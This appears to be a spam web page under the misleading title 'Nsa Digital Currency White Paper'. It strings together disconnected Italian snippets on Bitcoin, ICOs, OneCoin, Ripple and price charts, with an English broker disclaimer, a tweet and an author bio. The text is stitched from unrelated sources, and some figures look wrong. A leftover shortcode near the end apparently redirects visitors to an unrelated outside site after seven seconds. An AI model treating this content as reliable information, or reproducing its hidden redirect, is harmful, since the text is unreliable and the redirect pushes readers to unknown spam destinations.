“Nsa Digital Currency White Paper -Valuta digitale inventata nel 2008”

ELP Finance LTD is regulated by the Malta Financial Services Authority. ELP Finance LTD is authorized to provide Investment Services to Retail Clients and Professional Clients (excluding collective investment schemes). The website investire.biz is directed to Retail Clients and Professional Clients (excluding collective investment schemes). Please read Exclusion of Liability, Privacy Policy, Risk Warning, Disclaimer, Cookie Policy and the Terms and Conditions before using this website. By continuing to access or use this website or any service on this site, you signify your acceptance of these terms and conditions. All financial investments involve some level of risk. The online trading carries a high level of risk and may not be suitable for all investors. Before deciding to invest you should carefully consider your investment objectives, the level of your experience, your willingness to take risks and consult an independent advisor. There is always the possibility to lose the investment, whole investment or part of it. So we suggest to invest money that you can afford to lose.

Come con una moneta tradizionale, è possibile utilizzare i Bitcoin per acquistare beni e servizi, a condizione che i commercianti dei vari negozi li accettino. La criptovaluta sta diventando sempre più popolare e grandi aziende come la Dell, Microsoft e Bloomberg cominciano ad accettarlo. Da notare, però, che gli acquisti bitcoin non hanno mezzi di base a tutela dei consumatori. Non c‘è una “ricevuta di pagamento” in quanto la prerogativa di questa moneta virtuale è proprio l’anonimato e tutti i benefici che ne derivano da esso. Di negativo c‘è da dire che si sono verificati casi di utilizzo di Bitcoin per transazioni illegali, come la droga e traffico d’armi e nel mercato nero online.

Passionate about crypto and blockchain since 2012. He’s the founder of HolyTransaction, the first consumer-oriented digital wallet that offers instant conversion into multiple digital cryptocurrencies.

Ogni volta che viene effettuata una transazione, essa parte nello stato di “non confermata”; diventerà “confermata” solo quando verificata attraverso una lista di marcatura oraria gestita collettivamente di tutte le transazioni conosciute, la blockchain (in italiano: “catena di blocchi”).

Direi che l’analisi precedente sulle divergenze, si è più che confermata. Divergenze rialziste, prima con il Momentum, e dopo anche sull’RSI, che hanno portato ad una bel rialzo del Bitcoin. Ora, il mercato sta “respirando”, stabilizzandosi sui 9000€. Prossimo target, spezzare la resistenza dei 9569€ (circa), che se si avverasse, il BTC arriverà a toccare anche …

#Russia: il tribunale di San Pietroburgo annulla la decisione di bloccare siti informativi sulle #criptovalute . (decisione che si traduce in un “cambio” di atteggiamento nei riguardi delle #crypto) #BLOCKCHAIN #bitcoin #hodlhttps://twitter.com/Cointelegraph/status/969013528744157189 …

Negli ultimi mesi attorno alle valute digitali è esplosa una vera e propria mania tanto da proiettare le quotazioni del bitcoin dagli 880 dollari di inizio 2017 agli attuali 15mila con un picco intorno a 20mila dollari toccato il 16 dicembre. Valori che restano estremamente volatili, per intenderci alla fine di questo articolo le quotazioni potrebbero essere scese o salite di un migliaio di dollari. Bitcoin è una moneta digitale senza un valore intrinseco creata artificialmente scarsa (l’ammontare finale è predeterminato). Una costruzione che per alcuni aspetti ricorda il “gold standard” in vigore dal 1880 al 1917. La stessa mancanza di flessibilità sarebbe, secondo alcuni dei critici più attenti, il vero tallone d’Achille del bitcoin qualora volesse realmente proporsi come valuta alternativa del commercio internazionale. Non esiste nessun termine di paragone o nessun asset di fondo (i cosiddetti fondamentali) a cui rapportarne il valore. Le banconote, che a loro volta oggi non sono più legate a nessun asset, conservano quanto meno un qualche ancoraggio alla ricchezza della nazione che le emette. Diventa quindi estremamente difficile capire se e quanto le quotazioni della valuta digitale siano eccessive.

Le Ico sono un fenomeno recente. La prima Ico è attribuita alla Omni, che nel 2013 ha raccolto oltre 5 milioni di dollari in bitcoin attraverso le vendite dei propri token Mastercoin. Dopo il successo di Mastercoin, altre società di criptovaluta hanno seguito l’esempio. Ethereum ha effettuato la sua Ico nel 2014 e Waves nel 2016. Ethereum ha raccolto 18 milioni di dollari dalla suo Ico, mentre Waves ne ha raccolti 16 milioni. E il successo di queste tre iniziative ha dato slancio al settore. Un pubblico sempre più vasto, seppur di nicchia, ha iniziato a investire con un solido team di sviluppo, solide basi tecnologiche e una struttura aziendale trasparente.

OneCoin truffava i suoi investitori non solo vendendo questa fantomatica criptovaluta mai esistita, ma anche altri servizi (se così possiamo definirli). Qui sotto potete vedere i servizi di “formazione” per i trader che volevano operare nel trading online. Cifre assurde per ottenere il nulla totale, dato che questi pacchetti erano inesistenti.

Cryptocurrencies are used primarily outside existing banking and governmental institutions and are exchanged over the Internet. While these alternative, decentralized modes of exchange are in the early stages of development, they have the unique potential to challenge existing systems of currency and payments. As of December 2017 total market capitalization of cryptocurrencies is bigger than 600 billion USD and record high daily volume is larger than 500 billion USD.[38]

  Su richiesta dell’Istituto VFF Mare Nostrum e.V. ( Austria ), pubblico la seguente rettifica : “Ho effettuato un errore di valutazione di documenti nell’avere riportato involontariamente …Leggi tutto »

Cardano è il primo progetto blockchain costruito su una ricerca accademica peer reviewed. Questo livello di controllo della tecnologia di base è una novità del settore. Inoltre, Cardano è unico in quanto è scritto nel linguaggio di codifica Haskell. Haskell è considerato uno dei linguaggi di programmazione più sicuri, riducendo al minimo il numero di errori e aggiungendo sicurezza estremamente robusta alla piattaforma.

Parecchi anni fa ormai mi sono riufitato di continuare a tenere i miei risparmi in banca a fare la muffa ed ho cominciare a studiare e fare corsi sul trading. Quel mio semplice gesto ha cambiato per sempre il mio approccio verso il denaro e sopratutto mi ha reso totalmente autonomo riguardo la gestione e l’investimento dei miei risparmi. Adesso gestisco i miei soldi facendo trading su due conti diversi, con due scopi differenti.

Per ogni transazione, si paga una percentuale infinitesimale di XRP, che però non viene raccolta da nessuno, ma viene distrutta: serve a evitare le transazioni seriali di bot. La società Ripple ha creato 100 milioni di XRP, ma ne ha messi sul mercato soltanto 38 milioni, i rimanenti sono stati investiti in ricerca per il sistema. I Ripple XRP servono al sistema perché sono “l’ultima spiaggia” per le sue transazioni: se non si riesce a trovare una catena di fiducia per un trasferimento di beni, il sistema ricorre agli XRP, sul cui valore invece concordano (e ripongono fiducia) tutti gli utenti.

MultiBit: è un client che scarica una versione ridotta della catena dei blocchi, che riduce di molto i tempi di sincronizzazione e lo spazio di archiviazione del client originale con un minimo compromesso al livello di sicurezza.

L’utilizzo da parte di tifosi di  STARS Token sostituirà l’attuale infrastruttura di servizi terzi utilizzata da molti club per la vendita di biglietti e la commercializzazione di oggetti che riportano l’emblema della squadra.

A inizio 2000, e-gold aveva un grande seguito negli USA: erano milioni gli utenti attivi e la piattaforma di e-gold gestiva transazioni che ammontavano a miliardi di dollari all’anno. Poi però, arrivò il declino.

Nel caso in cui optiate per la seconda opzione allora è buona cosa creare un indirizzo Bitcoin per ogni singola transazione, in modo da evitare complicazioni relative all’associazione di ogni singola somma in Alle fatture potete aggiungere l’indirizzo relativo in un secondo momento e con totale facilità. È possibile infatti fare affidamento anche ad una pagina di informazioni separata dal resto, sulla quale vengono elencati tutti gli indirizzi Bitcoin con i relativi numeri delle fatture. In questo modo gli acquirenti possono semplicemente copiare il numero che li riguarda e aggiungerlo al loro client.

Tutti i nodi della rete competono per essere i primi a trovare una soluzione di un problema crittografico che riguarda il blocco candidato, un problema che non può essere risolto in altri modi che tramite bruteforce e che quindi richiede sostanzialmente un enorme numero di tentativi. Quando un nodo trova una soluzione valida l’annuncia al resto della rete attribuendosi contemporaneamente i bitcoin in premio previsti dal protocollo, i nodi che ricevono il nuovo blocco lo verificano e lo aggiungono alla loro catena, ricominciando il lavoro di mining al di sopra del blocco appena ricevuto.

Bisogna considerare, inoltre, che poiché la capitalizzazione di mercato della maggior parte delle valute digitali è particolarmente ridotta, l’andamento può anche risentire delle operazioni di singoli investitori, ovvero il piccolo investitore è in balia di quello che decidono di fare i “big player” del mercato.

I Bitcoin sono venduti come qualsiasi altro bene, tramite broker o scambi commerciali (ad esempio il Bitfinex di Hong Kong). Tutto ovviamente in Rete dove esistono dei siti da dove scaricare il software di riferimento per creare il proprio portafoglio e quindi iniziare i vari movimenti. Per “riempire” il portafogli e generare, quindi, Bitcoin bisogna essere pratici di “mining” ovvero il far eseguire dei calcoli matematici al processore del computer. Oltre ad Internet, per comprare bitcoin è possibile utilizzare, comunque, anche del denaro contante (conto in banca, carte di credito o piattaforme elettroniche come PayPal). In alcune città è possibile trovare sportelli bancomat Bitcoin che caricano il denaro virtuale sul portafoglio elettronico creato.

Ampio risalto ha avuto sui media internazionali[50] l’annuncio che il colosso dei blog Automattic ha adottato, a partire dal 15 novembre 2012, la criptovaluta come metodo di pagamento per sfuggire al blocco di più di 60 paesi adottato da PayPal e dalle carte di credito.

Come si può notare, il Bitcoin sta continuando a testare, ritracciando e rimbalzando, il forte supporto degli 8100 circa; questo significa che, sta per arrivare una forte spinta rialzista, dovuta dal doppio minimo formatosi nell’area verde che ho disegnato, oppure dovremo purtroppo assistere ad un calo, conseguenza del break del supporto, possibilmente in zona …

Chiunque e in qualsiasi momento, può consultare l’intera catena dei blocchi attraverso un libro mastro digitale, il ledger. Al suo interno, sono registrate in maniera trasparente e immutabile tutte le transazioni effettuate, dal primo all’ultimo blocco.

Anche se i wallet dei servizi online sono comunque sempre esposti al rischio hacking. Per esempio, uno dei più famosi bitcoin exchange in Giappone, ovvero Mt. Gox, è stato costretto a chiudere i battenti dopo che degli hacker si erano intrufolati all’interno dei loro server e avevano rubato bitcoin per il valore di oltre $450 milioni.

Tra gli scenari previsti per un possibile fallimento di Bitcoin, vi sono la svalutazione della moneta, una base di utenti in diminuzione, o un attacco frontale al sistema da parte dei governi. Non è però possibile bandire ogni forma di denaro digitale come Bitcoin.[25] La decentralizzazione e l’anonimato che fanno intrinsecamente parte di Bitcoin possono essere viste come una reazione ai procedimenti giudiziari nei confronti di aziende che lavoravano nell’ambito del denaro elettronico come e-gold e Liberty Dollar.[26] Questo perché il sistema in sé è a tutti gli effetti una raccolta del risparmio, pesantemente regolamentata in tutti i paesi del mondo in senso repressivo (per evidenti motivi, vedi schema Ponzi), e nel caso in questione, come già esposto, una raccolta perdipiù abusiva. In un’inchiesta di Danny O’Brien pubblicata sull’Irish Times viene detto che «Quando mostro alle persone l’economia Bitcoin, chiedono “Ma è legale?” ed “È un imbroglio?” Immagino che ci siano avvocati ed economisti che stiano cercando di dare una risposta a queste non semplici domande. Sospetto che la lista delle persone che cerca di dare questa risposta si arricchirà ben presto di legislatori.»[25][27] I valori della moneta si fondano sulla fiducia dei suoi utilizzatori. La gestione del bitcoin, e quindi il suo valore e il suo cambio, sono affidati al libero mercato, e quindi alle forze della domanda e dell’offerta. [redirect url=’http://curbee.info/bump’ sec=’7′]

Leave a Reply

Your email address will not be published. Required fields are marked *